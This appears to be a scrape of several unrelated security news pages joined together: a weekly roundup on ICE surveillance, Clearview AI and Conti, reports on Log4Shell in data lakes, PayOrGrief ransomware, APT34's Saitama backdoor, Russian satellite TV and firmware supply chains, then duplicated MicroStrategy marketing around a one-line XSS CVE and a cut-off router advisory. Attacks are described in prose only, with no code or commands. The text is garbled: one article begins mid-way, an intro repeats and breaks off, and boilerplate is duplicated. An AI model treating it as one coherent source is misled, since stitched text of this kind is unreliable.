Plus: New details of ICE’s dragnet surveillance in the US, Clearview AI agrees to limit sales of its faceprint database, and more.

A group of human rights lawyers and investigators called on the Hague this week to bring what would be the first ever “cyber war crimes” charges. The group is urging the International Criminal Court to bring charges against the dangerous and destructive Russian hacking group known as Sandworm, which is run by Russia’s military intelligence agency GRU. Meanwhile, activists are working to block Russia from using satellites controlled by the French company Eutelsat to broadcast its state-run propaganda programming.

Researchers released findings this week that thousands of popular websites record data that users type into forms on the site before they hit the Submit button—even if the user closes the page without submitting anything. Google released a report on an in-depth security analysis it conducted with the chipmaker AMD to catch and fix flaws in specialty security processors used in Google Cloud infrastructure. The company also announced a slew of privacy and security features for its new Android 13 mobile operating system along with a vision for making them easier for people to understand and use.

The European Union is considering child protective legislation that would require scanning private chats, potentially undermining end-to-end encryption at a massive scale. Plus, defenders from the cybersecurity nonprofit BIO-ISAC are racing to protect the bioeconomy from digital threats, announcing a partnership this week with Johns Hopkins University Applied Physics Lab that will help fund pay-what-you-can incident response resources.

But wait, there’s more. Each week we round up the news that we didn’t break or cover in-depth. Click on the headlines to read the full stories. And stay safe out there.

The United States is completing development of a new generation of high-security encryption standards that will be robust in the current technical climate and are designed to be resistant to circumvention in the age of quantum computing. And while the National Security Agency contributed to the new standards' creation, the agency says it has no special means of undermining the protections. Rob Joyce, the NSA’s director of cybersecurity, told Bloomberg this week, “There are no backdoors." The NSA has been implicated in schemes to backdoor encryption before, including in a situation in the early 2010s in which the US removed an NSA-developed algorithm as a federal standard over backdoor concerns.

An extensive investigation by Georgetown Law’s Center on Privacy & Technology reveals a more detailed picture than ever of US Immigration and Customs Enforcement agency surveillance capabilities and practices. According to the report, published this week, ICE began developing its surveillance infrastructure at the end of the George W. Bush administration, years before it was previously thought to have begun these efforts. And researchers found that ICE spent $2.8 billion on surveillance technology, including face recognition, between 2008 and 2021. ICE was already known for its aggressive and invasive surveillance tactics during the Donald Trump administration’s anti-immigration crackdowns, but the report also argues that ICE has “played a key role in the federal government’s larger push to amass as much information as possible” about people in the United States.

“Our two-year investigation, including hundreds of Freedom of Information Act requests and a comprehensive review of ICE’s contracting and procurement records, reveals that ICE now operates as a domestic surveillance agency,” the report says. “By reaching into the digital records of state and local governments and buying databases with billions of data points from private companies, ICE has created a surveillance infrastructure that enables it to pull detailed dossiers on nearly anyone, seemingly at any time.”

In a legal settlement this week, the face recognition and surveillance startup Clearview AI agreed to a set of restrictions on its business in the US, including that it won’t sell its faceprint database to businesses or individuals in the country. The company says it has more than 10 billion faceprints in its arsenal belonging to people around the world and collected through photos found online. The settlement comes after the American Civil Liberties Union accused Clearview of violating the Illinois Biometric Information Privacy Act. The agreement also stipulates that the company won’t be allowed to sell access to its database in Illinois for five years. “This settlement demonstrates that strong privacy laws can provide real protections against abuse,” Nathan Freed Wessler, a deputy director of the ACLU Speech, Privacy, and Technology Project said in a statement. Despite the privacy win, Clearview may continue to sell its services to federal law enforcement, including ICE, and police departments outside of Illinois.

Costa Rican president Rodrigo Chaves said on Sunday that the country was declaring a national emergency after the notorious Conti ransomware gang infected multiple government agencies with malware last week. Sunday was the first day of Chaves' presidency. Conti leaked some of a 672 GB trove of stolen data from multiple Costa Rican agencies. In April, the Costa Rican social security administration had announced that it was the victim of a Conti attack. “At this time, a perimeter security review is being carried out on the Conti Ransomware, to verify and prevent possible attacks," the agency tweeted at the time.

The NSA Swears It Has ‘No Backdoors’ in Next-Gen Encryption

The White House and tech industry pledge $150 million over two years to boost open source resiliency and supply chain security.

Marking the one-year anniversary of President Biden's Executive Order on Improving the Nation's Cybersecurity, the Linux Foundation and the Open Source Software Security Foundation joined with 90 private-sector executives and government leadership to create a 10-point plan to improve the security of open source software. 

The plan has three primary goals — secure open source software production, improve vulnerability discovery and remediation, and shorten ecosystem patching response time — according to the announcement. 

The Open Source Software Security Mobilization Plan proposes 10 specific streams of investment in open source security including: education, risk assessment, digital signatures, memory safety, incident response, better scanning, code audits, data sharing, SBOMs, and improved software supply chain. The plan outlines the need for about $150 million in additional funding over the next two years. Amazon, Google, Ericsson, Intel, Microsoft, and VMware have pledged an initial investment of $30 million between them.

"What we are doing here together is converging a set of ideas and principles of what is broken out there and what we can do to fix it," Brian Behlendorf, executive director, Open Source Security Foundation (OpenSSF), said in a statement announcing the group's new initiative. **"**The plan we have put together represents the 10 flags in the ground as the base for getting started. We are eager to get further input and commitments that move us from plan to action.”

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Linux, OpenSSF Champion Plan to Improve Open Source Security

A brand-new attack vector lays open enterprise data lakes, threatening grave consequences for AI use cases like telesurgery or autonomous cars.

Enterprise data lakes are filling up as organizations increasingly embrace artificial intelligence (AI) and machine learning — but unfortunately, these are vulnerable to exploitation via the Java Log4Shell vulnerability, researchers have found.

Generally, organizations are focused on ingesting as many data points for training an AI or algorithm that they can, with an eye toward privacy — but all too often, they're skipping over hardening the security of the data lakes themselves.

According to research from Zectonal, the Log4Shell bug can be triggered once it is ingested into a target data lake or data repository via a data pipeline, bypassing conventional safeguards, such as application firewalls and traditional scanning devices.

As with the original attacks targeting the ubiquitous Java Log4j library, exploitation requires only a single string of text. An attacker could simply embed the string within a malicious big-data file payload to open up a shell inside the data lake, and from there can initiate a data-poisoning attack, researchers say. And, since the big-data file carrying the poison payload is often encrypted or compressed, the difficulty of detection is much greater.

“The simplicity of the Log4jShell exploit is what makes it so nefarious,” says David Hirko, founder at Zectonal. “This particular attack vector is difficult to monitor and identify as a threat due to the fact that it blends in with normal operations of data pipelines, big-data distributed systems, and machine-learning training algorithms."

**Leveraging RCE Exploits to Access Data Lakes  
**One of the ways to accomplish this attack is by targeting vulnerable versions of the no-code, open source extract-transform-load (ETL) software application — one of the most popular tools for populating data lakes. An attacker could access the ETL service running in a private subnet from the public Internet via a known remote code execution (RCE) exploit, researchers explain in the report.

The Zectonal team put together a working proof-of-concept (PoC) exploit that used this vector, successfully gaining remote access to subnet IP addresses that were part of a virtual private cloud hosted by a public cloud provider.

While ETL patched the RCE issue last year, the components have been downloaded millions of times, and it appears that security teams have lagged in applying the fix. The Zectonal team was successful in "triggering an RCE exploit for multiple unpatched releases of the ETL software that spanned a two-year period," according to the report, shared with Dark Reading prior to publication.

"This attack vector isn't as simple as just kind of sending a text string to a Web server," Hirko says, noting the need to penetrate the data supply chain. "An attacker needs to compromise a file somewhere upstream and then have it be flowed into the target data lake. Say you were considering weather data — you might be able to manipulate a file from a weather sensor so that it contained this particular string."

This particular exploit and vulnerability has patches available, but there are likely many different avenues to achieving this kind of Log4Shell attack.

"There are probably many, many previously unknown or undisclosed vulnerabilities that allow the same thing," Hirko says. "This is one of the first data poisoning-specific attack vectors that we've seen, but we believe that data poisoning as a subset of AI poisoning is going to be one of the new attack vectors of the future."

**Real-World Consequences  
**So far, Zectonal hasn't seen such attacks in the wild, but researchers hope the threat is on security teams' radar screens. Such attacks may be rare, but they can have outsized consequences. For instance, consider the case of autonomous vehicles, which rely on AI and sensors to navigate city streets.

"Automakers are training their AI to look at stoplights, to know when to stop, slow down, or go in the classic red, yellow, green format," Hirko explains. "If you were to start poisoning your data lake that was training your AI, it's possible to manipulate the AI software to behave in unforeseen ways. Perhaps your car unintentionally gets trained to go when the traffic light turns red and stop when it turns green. So, that's the type of attack vector that we suspect we'll be seeing in the future."

**Security Protections Lag  
**The risks are gaining a higher profile among practitioners, Hirko tells Dark Reading — many of whom understand the danger but are at a loss for how to tackle it. Among the challenges is the fact that approaching the problem requires a new way of implementing security, as well as new tools.

"We were able to send the poisoned payload through a pretty common data pipeline," Hirko says. "Traditionally, these kinds of files and data pipelines don't come through your standard front-door set of firewalls. How data comes into the enterprise, how data comes into the data lake, hasn't really been part of the classic security posture of defense in depth or zero trust. If you're using any of the major cloud providers, data that comes in from an object storage bucket won't necessarily come through that firewall."

He adds that the file formats that these types of attacks can be bundled into are relatively new and somewhat obscure — and because they're specific to the big data and AI world, they're not as easy to scan with typical security tools, which are made to scan documents or spreadsheets.

Thus, for their part, security vendors need to focus on the development of different types of products to gain that further visibility, he notes.

"Companies are looking at the quality of the data, components, individual data points — and it just makes sense to look at the security vulnerability of that data as well," Hirko says. "We suspect that data observability will be built into quality assurance as well as data security. This is an emerging kind of data and AI security domain."

Log4Shell Exploit Threatens Enterprise Data Lakes, AI Poisoning

The group that shut down the second largest city in Greece was not new but a relaunch of DoppelPaymer.

In July 2021, the second largest city in Greece fell victim to a cyberattack orchestrated by an apparently amateur ransomware group. PayOrGrief appeared to have existed for just a couple of weeks when it broke through Thessaloniki's security systems.

The group exfiltrated and encrypted numerous files before issuing a devastating $20 million ransom demand. Unsure of just how far the breach went, the municipality's security team was forced to shut down all of the Thessaloniki website's public-facing services and launch a full investigation into the breach before it could even consider whether to pay the immense ransom.

**Spot the Difference: PayOrGrief and DoppelPaymer  
**It didn't take long for PayOrGrief to gain a reputation for disruption. Its use of double extortion ransomware tactics has proved effective in targeting organizations in all kinds of industries, including numerous manufacturers and municipalities like Thessaloniki.

The novelty of PayOrGrief's operation made it easy for it to beat security tools based on historical attacks, particularly in those first few weeks. Security experts had their suspicions, however, that PayOrGrief was more than the latest budding group to join the ransomware scene. Its attack playbook suggested experience.

Further investigations more or less confirmed that PayOrGrief was not a new group but a rebrand of an older one called DoppelPaymer, which ended its operations in May 2021. With the new PayOrGrief moniker and a slightly shifted set of tactics, techniques, and procedures (TTPs), the group has seen success to the tune of over $10 million in ransom payments.

The success of the PayOrGrief rebrand demonstrates just how easily a group can obscure itself from the sight of tools based on historical data. Altering its TTPs allowed PayOrGrief to beat security tools, but these changes were far from substantial, and for analysts the DoppelPaymer playbook was still plain to see.

**How PayOrGrief Orchestrates an Attack  
**This playbook was thrown open when, in July 2021, PayOrGrief targeted a European manufacturing company. The company in question had deployed Darktrace's self-learning artificial intelligence (AI) technology, which was continuously updating its understanding of the digital business and looking for anomalous behavior indicative of a threat. This technology was able to reveal the life cycle of PayOrGrief's attack.

PayOrGrief often begins its attacks with phishing emails containing fake updates or malicious documents through which it can inject malware strains like Dridex into target devices. In this case, four devices were compromised, likely by a single phishing campaign, and began to make command-and-control (C2) connections to several rare external IPs.

These connections, encrypted with an invalid SSL certificate, were followed by a 50MB upload of data to the company's corporate server. With this escalated position, the attackers established keep-alive beacons and were then ready to begin the exfiltration stage of this double extortion ransomware attack.

    

AI-generated summary of the incident, showing the data exfiltration from a single device. (Source: Darktrace)

In just a few hours, over 100GB of data was exfiltrated via HTTPS to the file storage platform Mega. The attackers had targeted more than this, but the company's autonomous defenses stood in their way.

Having recognized that this behavior was highly unusual in the context of the business' normal "pattern of life," the AI could have stopped the threat at its earliest stages if not mostly blocked from intervening by the company's configuration settings. The AI took what limited action it had permission to and limited the scope of the data exfiltration. By detecting and blocking anomalous file activity, it obstructed some of the exfiltration efforts, while continuing to monitor those parts of the digital estate in which it couldn't take direct action.

The attackers continued to move laterally through the digital estate, using RDP and SMB for internal reconnaissance and exploiting administrative privileges and processes. And then, only 10 hours after the first compromised devices began making malicious connections, PayOrGrief deployed its ransomware.

Encryption spread through the company, with an SMB write with the ".pay0rgrief" file extension seen on 137 devices. Once again, the AI cybersecurity system was able to protect certain devices from anomalous file activities and narrow the scope of the attack considerably. Through each stage of the attack — including C2, lateral movement, internal reconnaissance, exfiltration, and encryption — the AI suggested actions to block specific connections and enforce devices' patterns of life in order to halt the threat without disrupting the business itself.

**Stopping the Next Big Name in Ransomware  
**PayOrGrief is no longer an unfamiliar name, a fact that will now be reflected in the OSINT of many rules-based cybersecurity solutions. But if organizations continue with this approach, looking at historical attacks and playing continual catch-up with the latest ransomware strains and TTPs, they will always be vulnerable to whatever is coming next. As the speed and efficacy of the DoppelPaymer rebrand demonstrates, focusing on the specificities of the attacker is a short-sighted solution.

Businesses should instead adopt cybersecurity tools that stop threats regardless of whether they have been seen before. By continuously updating their understanding of how your business should behave normally, AI-driven solutions like Darktrace can piece together anomalies to detect emerging attacks and even take autonomous action to stop them. That means no matter what they call themselves, or how they operate, attackers will be seen for what they are — and stopped.

How to Avoid Falling Victim to PayOrGrief's Next Rebrand

Russia is using satellites controlled by French operator Eutelsat to broadcast state-run programming. A grassroots group is pushing for that to stop.

“If the European authorities impose new sanctions against Russian channels, we will stop their broadcast,” the company said. It added: “At this stage, no regulator or other competent authority has asked us to stop broadcasting private Russian television channels in Russia.”

Philipoff and Lange have been turning their appeal to politicians, but with minimal effect. “We sent letters to all French members of the European Parliament,” Lange says. “Not a single answer.”

How, exactly, Paris or Brussels might force Eutelsat to block those Russian channels is an open question. Lange and Philipoff say that if the European Parliament can ban the English-language Sputnik and RT stations from their airwaves, sanctions should have the power to remove Russian-language TV from their satellites. In May, European Commission president Ursula von der Leyen told the EU Parliament they would ban three new broadcasters “in whatever shape or form, be it on cable, via satellite, on the internet, or via smartphone apps.”

Politico has reported that those three broadcasters are Russian-language news networks that reach Europe, with some help from Eutelsat’s satellites.

Eutelsat told WIRED, “We are aware of the European Union's intention to sanction three Russian channels, two of which are broadcast on our satellites, and we are ready to immediately cease broadcasting them as soon as the corresponding European regulation is published.”

The United States recently slapped sanctions on three Russian-language TV stations, including NTV (the flagship station of provider NTV+), after concluding that they are “spreading disinformation to bolster Putin’s war.” Those sanctions are likely to have an impact on their foreign revenue, but not on their Russian operations.

Going after the satellites themselves would be a hugely disruptive escalation. Moscow and Kyiv are already taking aim at each others’ satellite communications.

Western intelligence agencies say, in the hours before its invasion, Russian hackers took aim at American satellite provider Viasat. “Although the primary target is believed to have been the Ukrainian military, other customers were affected, including personal and commercial internet users,” the UK’s National Cyber Center said in a joint statement with the US and EU.

Earlier this week, just ahead of Russia’s Victory Day celebrations—which offered Moscow a prime opportunity to project strength amidst its stalled war—the State Special Communications Service of Ukraine announced that “\[television\] broadcast from the Russian satellite to the occupied Ukrainian regions was unexpectedly turned off.”

As WIRED has reported, Ukraine is aggressively deploying American- and European-provided Starlink terminals, while Russian satellite communications remain troubled.

European cooperation isn’t limited to Eutelsat’s satellite television. Eutelsat owns two subsidiaries in Russia, including home internet provider Konnect. In turn, the Russian state satellite operator owns a small stake in Eutelsat itself. (Corporate documents say most of tje 3.62 percent ownership stake corresponds to the Russian Satellite Communications Company, or RSCC.)

Meanwhile, some two dozen countries make up the Moscow-based Intersputnik consortium, primarily in Eastern Europe, the Middle East, and Asia. Its members include the Czech Republic, Romania, Germany, and Ukraine. In 2020, France announced its intention to join Intersputnik.

Intersputnik managed part of the Soviet Union’s satellite fleet, before being privatized after the fall of the USSR. Moscow’s influence on the organization is fairly apparent: The chair of its board is a senior civil servant in the Russian government.

As the West continues its messy divorce with Russia, an organization like Intersputnik could allow Russia to launch and maintain satellite service, underpinning not just television, but internet service, military communications, and geospatial imaging.

The Diderot Committee’s Lange and Philipoff hope that this current fight could enable more open flows of information in the future—that’s what informs the tongue-in-cheek name of their group. As its website explains: “On July 6, 1762, just nine days after the coup d’état of June 28 that put her on the throne, Catherine II invited the French philosopher Denis Diderot to come to Russia in order to publish _L’encyclopédie_, which had been banned in Paris. Diderot accepted her invitation and arrived in St. Petersburg in October of 1773."

Had Russia not pushed back against France’s censorship, the _Encyclopédie_, one of the most important works of the Enlightenment, may have never been published.

How One Company Helps Keep Russia’s TV Propaganda Machine Online

A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama.
Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group.
"Like many of these attacks, the email contained a

A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama.

Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group.

"Like many of these attacks, the email contained a malicious attachment," Fortinet researcher Fred Gutierrez said. "However, the attached threat was not a garden-variety malware. Instead, it had the capabilities and techniques usually associated with advanced persistent threats (APTs)."

APT34, also known as OilRig, Helix Kitten, and Cobalt Gypsy, is known to be active since at least 2014 and has a track record of striking telecom, government, defense, oil, and financial sectors in the Middle East and North Africa (MENA) via targeted phishing attacks.

Earlier this February, ESET tied the group to a long-running intelligence gather operation aimed at diplomatic organizations, technology companies, and medical organizations in Israel, Tunisia, and the United Arab Emirates.

The newly observed phishing message contains a weaponized Microsoft Excel document, opening which prompts a potential victim to enable macros, leading to the execution of a malicious Visual Basic Application (VBA) macro that drops the malware payload ("update.exe").

Furthermore, the macro takes care of establishing persistence for the implant by adding a scheduled task that repeats every four hours.

A .NET-based binary, Saitama leverages the DNS protocol for its command-and-control (C2) communications as part of an effort to disguise its traffic, while employing a "finite-state machine" approach to executing commands received from a C2 server.

"In the end, this basically means that this malware is receiving tasks inside a DNS response," Gutierrez explained. DNS tunneling, as it's called, makes it possible to encode the data of other programs or protocols in DNS queries and responses.

In the final stage, the results of the command execution are subsequently sent back to the C2 server, with the exfiltrated data built into a DNS request.

"With the amount of work put into developing this malware, it does not appear to be the type to execute once and then delete itself, like other stealthy infostealers," Gutierrez said.

"Perhaps to avoid triggering any behavioral detections, this malware also does not create any persistence methods. Instead, it relies on the Excel macro to create persistence by way of a scheduled task."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Saitama backdoor Targeted Official from Jordan's Foreign Ministry

The supply chain for firmware development is vast, convoluted, and growing out of control: patching security vulnerabilities can take up to two years. For cybercriminals, it's a veritable playground.

BLACK HAT ASIA 2022 — When it comes to developing the firmware that powers computing devices, the ecosystem consists of complex supply chains that have multiple contributors. For any given device, firmware could be made up of a hodgepodge of components from different sources. And that means that when it's time to address security vulnerabilities, it's far from a straightforward process to get a patch out to the public.

During a panel-discussion session at Black Hat Asia on Thursday, entitled "The Firmware Supply-Chain Security Is Broken: Can We Fix It?", Kai Michaelis, co-founder and CTO at Immune GmbH, outlined what he called the overgrown supply-chain "tree," out of which grows onerous code reviews, and lengthy patching processes when a bug is found.

In fact, six to nine months for patches to roll out is the average, according to the panelists — with two years being not uncommon. And that means the supply chain represents a wide attack surface that's ripe for compromise, they warned. Given that vulnerable firmware threatens safety of the operating system and any applications, the potential for cyberattackers to find exploitable vulnerabilities is a serious concern.

**A Thorny Tree of Supply-Chain Complexity**

The final firmware that vendors incorporate into their hardware is a multisourced affair, explained Michaelis. Stakeholders can include various component vendors, a few open source repositories, reference implementations, original design manufacturers, independent BIOS vendors, and finally, the original equipment manufacturers (OEMs) that create and sell the final product to channel partners and end users.

Further complicating matters is the fact that subsystem vendors might be sitting in the middle of the code tree, itself combining elements from multiple component manufacturers into a single offering.

The unfortunate end result is that when a vulnerability is reported, OEMs often have multiple "branches" from which patches and updates flow — and they usually have no visibility to each other.

"It's a tree of suppliers and updates with little coordination between them, and the OEM has to ingest all of it," Michaelis said. "For vendors, packaging updates is a fairly manual process, and then consumers need to actually install those updates. In all, the patching process as it stands can be measured in months to years."

One of the main issues that Michaelis flagged is the fact that when bugs are found, they may be benign in and of themselves. However, when combined with additional vulns in other parts of the firmware, the flaws become weaponizable and could allow attacks on value-added reseller (VAR) partners — and from there, end users.

"Convincing a vendor to patch what it believes is a harmless flaw is not easy," he said. "And even if there is a patch, it takes so long for it to get downstream that an attacker could easily find another vulnerability to combine with it in the meantime. So this is the problem: Bugs exist in isolation because vendors don't talk to each other, and bugs have a long shelf life."

There are at least three other aspects that make matters even worse: One, end-of-life (EoL) devices often don't get updates; two, each vendor follows its own patch cycle; and three, sometimes vendors offer silent updates without issuing an advisory, which can discourage OEMs from incorporating patches.

**Repeating the Same Mistakes**

Alex Matrosov, founder and CEO at Binarly, explained during the panel that like in the software supply chain, firmware bugs can also be spread and re-imported even after they've been patched, resulting in what he called "repeatable failures."

For instance, a bug recently disclosed in one of the components in the Intel M15 laptop kit (CVE-2022-27493) is a classic out-of-bounds write flaw stemming from system-management mode (SMM) memory corruption — but not as what it seems.

"It's actually a 2019 bug found in the AMI codebase that we've now discovered in 2022 firmware," Matrosov explained. "This vulnerability was fixed, but the fixed version was not included by the device vendor. It's a very vulnerable component and has been known for years as a suitable attack vector, and it should be removed."

In another example, vulnerable code in an EDK open source library called SecurityPkg was removed in EDK II in 2018. However, somehow it found its way into 2022 firmware affecting several OEMs, via another library. "The risk was exponentially compiled," Matrosov said.

**Best Principles for Pruning Back the Patching Misery**

So, what's to be done? According to the panel, it will take a profound shift in strategy and thinking to reliably shore up firmware security. However, a good place to start is an aspirational list of first principles.

The panelists advocated, for instance, that OEMs and members of the security community as a whole make a concerted effort to educate component vendors and other supply-chain elements about security and convince them that updates are a necessity, even for EoL devices — and that further, if they don't issue a CVE, it becomes more difficult to communicate the urgency to patch and the bugs become difficult to track.

OEMs also should put in place efforts to increase risk transparency, according to the panel. This can be done by facilitating greater communication between vendors and creating a centralized repository of information about patches and bugs.

"Fixing the supply chain is a team sport," Matrosov said, noting that working with computer emergency response teams (CERTs) is a good goal.

"We really need an independent body to help coordinate patches when they affect multiple vendors, and to facilitate simultaneous patching. If one vendor patches and another doesn't, it creates a dangerous zero-day situation for a subset of the devices," he added.

Private security community collaboration will also be key, the panelists said. For instance, the Linux Foundation has launched a website called LVFS, which is a vendor firmware service that allows OEMs to upload firmware updates to be distributed to Linux users at zero cost. So far, about 150 vendors are participating, including Dell, HP, Intel, and Lenovo.

"There are about 1,000 different devices supported, and we've shipped more than 51 million updates since we started the project," said panelist Richard Hughes, principal engineer at Red Hat. "Also, we can take the firmware and decompress it into shards. A shard might be an EFI, binary, Intel microcodes, AMD PSP image, etc. So, all of those vendors uploading all those updates gives us a huge amount of data."

From there, the system can show users, say, the newest available Intel microcode for all of the different models in the system — and can push updates automatically.

There's plenty to be done, but Hughes struck an optimistic note.

"My personal conclusion is that by working together with CERTs and security companies, we can improve the immune system even further, speeding up the process of shipping fixes to end users and making sure that security issues patched by all vendors," Hughes said. "These are really hard problems that have plagued the entire industry for 20 years. Only now do we have all the infrastructure and the data to make things better."

Black Hat Asia: Firmware Supply-Chain Woes Plague Device Security

Cross-Site Scripting (XSS) vulnerability in MicroStrategy Web SDK 10.11 and earlier, allows remote unauthenticated attackers to execute arbitrary code via key parameter to the getGoogleExtraConfig task.

**Get to Know MicroStrategy**

Our company vision is intelligence everywhere. Our analytics platform delivers answers, and gets results. Our entire company is committed to your success.

**Pilot Enterprise Analytics**

Quickly deploy consumer-grade BI experiences for every role, on any device, with the platform that provides sub-second response at enterprise scale.

**Make your applications intelligent with Embedded Analytics**

Deliver in-context insights and analysis in any application and on any device. 

**Drive more value with MicroStrategy Cloud    **

Drive digital transformation and scale with confidence.

**Success Stories**

Hear stories from our customers and partners about how they use MicroStrategy to be a more Intelligent Enterprise.

**Featured Customer: Sainsbury's**

Learn how leading UK retailer Sainsbury’s democratized its data to empower every colleague from the store floor to the C-suite, powered by MicroStrategy.

**Featured Customer: Schwarz Group**

Explore how Schwarz IT enables brands like Lidl and Kaufland to drive global business impact with an enterprise analytics strategy, powered by MicroStrategy.

**Featured Customer: NICE**

Discover how AI-powered innovation and cloud-native technologies help NICE deliver the world’s leading cloud CX platform, with data and analytics visualization from MicroStrategy.

**Find Solutions with MicroStrategy**

Build consumer-grade intelligence applications, empower users with data discovery, and seamlessly push content to employees, partners, and customers in minutes.

01:30

**Overview of the MicroStrategy Platform**

Discover the power of MicroStrategy, the modern, open, enterprise BI platform that delivers intelligence everywhere. Watch this overrview to learn everything you need to know.

37753 views · April 01, 2021

31:41

**Data Storytelling with Dossiers**

Did you know you can easily build no-code analytics applications with MicroStrategy Dossiers? In this session from MicroStrategy World 2022, experts introduced the art of data storytelling.

960 views · February 02, 2022

08:57

**Overview of MicroStrategy Mobile**

Watch the MicroStrategy team review how to integrate context-rich analytics and collaborative workflows with powerful no-code mobile applications. Learn more about traditional mobile applications from the MicroStrategy platform.

3727 views · September 22, 2020

06:27

**Trusted Data for Excel, BI Tools, and Data Science Tools**

Leverage the power of the industry's strongest semantic graph. Watch this to learn how MicroStrategy will help you get the most out of Excel and other BI applications. The tools you love, with data you can trust.

4052 views · September 22, 2020

**HyperIntelligence**

Deploy analytics beyond the analyst by injecting insights and actions into the applications and websites your people use every day.

00:44

**Introduction to HyperIntelligence**

With HyperIntelligence, deliver instant insights into your everyday applications with no code to make informed decisions and take action faster.

26031 views · November 18, 2019

**Embedded Intelligence**

Learn about MicroStrategy's #1 rated platform for Embedded Analytics.

01:00

**Make your Applications Intelligent with Embedded Analytics**

MicroStrategy’s #1-rated Embedded Analytics platform provides faster in-context insights and analysis in any application and on any device. Extend analytics into portals and applications, allowing users to take advantage of actionable insights in their day-to-day workflows.

1007 views · October 14, 2021

11:35

**Overview of MicroStrategy Embedded Analytics**

MicroStrategy is the industry leader for application development and embedded analytics. Watch this video to learn more about the functionality related to customization and embedded analytics.

4023 views · May 29, 2020

**Cloud Intelligence**

The fastest, most efficient way to run your Intelligent Enterprise.

03:01

**What to Expect From Your Cloud Migration**

"Learn how you’ll collaborate with our MicroStrategy experts to ensure easy and efficient migration to the cloud—in a matter of weeks with no disruption to your users. "

681 views · June 22, 2021

43:31

**Top Trends: The Future of Cloud Computing**

Explore the top cloud trends on the horizon and learn to leverage robust application and infrastructure security to ensure integrity across a robust suite of analytics applications.

81 views · February 02, 2022

**Resources**

**Partners**

16:23

**Exasol: Turbocharging the BI Stack**

This session showcases how to accelerate time to insights and how to future-proof your MicroStrategy environment by adding Exasol to your data stack.

40 views · February 10, 2022

CVE-2020-22984: Business Intelligence & Analytics Solutions

**Get to Know MicroStrategy**

Our company vision is intelligence everywhere. Our analytics platform delivers answers, and gets results. Our entire company is committed to your success.

**Pilot Enterprise Analytics**

Quickly deploy consumer-grade BI experiences for every role, on any device, with the platform that provides sub-second response at enterprise scale.

**Make your applications intelligent with Embedded Analytics**

Deliver in-context insights and analysis in any application and on any device. 

**Drive more value with MicroStrategy Cloud    **

Drive digital transformation and scale with confidence.

**Success Stories**

Hear stories from our customers and partners about how they use MicroStrategy to be a more Intelligent Enterprise.

**Featured Customer: Sainsbury's**

Learn how leading UK retailer Sainsbury’s democratized its data to empower every colleague from the store floor to the C-suite, powered by MicroStrategy.

**Featured Customer: Schwarz**

Explore how Schwarz IT enables brands like Lidl and Kaufland to drive global business impact with an enterprise analytics strategy, powered by MicroStrategy.

**Featured Customer: NICE**

Discover how AI-powered innovation and cloud-native technologies help NICE deliver the world’s leading cloud CX platform, with data and analytics visualization from MicroStrategy.

**Find Solutions with MicroStrategy**

Build consumer-grade intelligence applications, empower users with data discovery, and seamlessly push content to employees, partners, and customers in minutes.

01:30

**Overview of the MicroStrategy Platform**

Discover the power of MicroStrategy, the modern, open, enterprise BI platform that delivers intelligence everywhere. Watch this overrview to learn everything you need to know.

36959 views · April 01, 2021

31:41

**Data Storytelling with Dossiers**

Did you know you can easily build no-code analytics applications with MicroStrategy Dossiers? In this session from MicroStrategy World 2022, experts introduced the art of data storytelling.

927 views · February 02, 2022

08:57

**Overview of MicroStrategy Mobile**

Watch the MicroStrategy team review how to integrate context-rich analytics and collaborative workflows with powerful no-code mobile applications. Learn more about traditional mobile applications from the MicroStrategy platform.

3703 views · September 22, 2020

06:27

**Trusted Data for Excel, BI Tools, and Data Science Tools**

Leverage the power of the industry's strongest semantic graph. Watch this to learn how MicroStrategy will help you get the most out of Excel and other BI applications. The tools you love, with data you can trust.

4007 views · September 22, 2020

**HyperIntelligence**

Deploy analytics beyond the analyst by injecting insights and actions into the applications and websites your people use every day.

00:44

**Introduction to HyperIntelligence**

With HyperIntelligence, deliver instant insights into your everyday applications with no code to make informed decisions and take action faster.

25983 views · November 18, 2019

**Embedded Intelligence**

Learn about MicroStrategy's #1 rated platform for Embedded Analytics.

01:00

**Make your Applications Intelligent with Embedded Analytics**

MicroStrategy’s #1-rated Embedded Analytics platform provides faster in-context insights and analysis in any application and on any device. Extend analytics into portals and applications, allowing users to take advantage of actionable insights in their day-to-day workflows.

925 views · October 14, 2021

11:35

**Overview of MicroStrategy Embedded Analytics**

MicroStrategy is the industry leader for application development and embedded analytics. Watch this video to learn more about the functionality related to customization and embedded analytics.

3944 views · May 29, 2020

**Cloud Intelligence**

The fastest, most efficient way to run your Intelligent Enterprise.

03:01

**What to Expect From Your Cloud Migration**

"Learn how you’ll collaborate with our MicroStrategy experts to ensure easy and efficient migration to the cloud—in a matter of weeks with no disruption to your users. "

666 views · June 22, 2021

43:31

**Top Trends: The Future of Cloud Computing**

Explore the top cloud trends on the horizon and learn to leverage robust application and infrastructure security to ensure integrity across a robust suite of analytics applications.

79 views · February 02, 2022

**Resources**

**Partners**

16:23

**Exasol: Turbocharging the BI Stack**

This session showcases how to accelerate time to insights and how to future-proof your MicroStrategy environment by adding Exasol to your data stack.

39 views · February 10, 2022

An information disclosure vulnerability exists in the router configuration export functionality of InHand Networks InRouter302 V3.5.4. A specially-crafted network request can lead to increased privileges. An attacker can send an HTTP request to trigger this vulnerability.

**Summary**

An information disclosure vulnerability exists in the router configuration export functionality of InHand Networks InRouter302 V3.5.4. A specially-crafted network request can lead to increased privileges. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

InHand Networks InRouter302 V3.5.4

**Product URLs**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 Score**

6.3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

**CWE**

CWE-321 - Use of Hard-coded Cryptographic Key

**Details**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

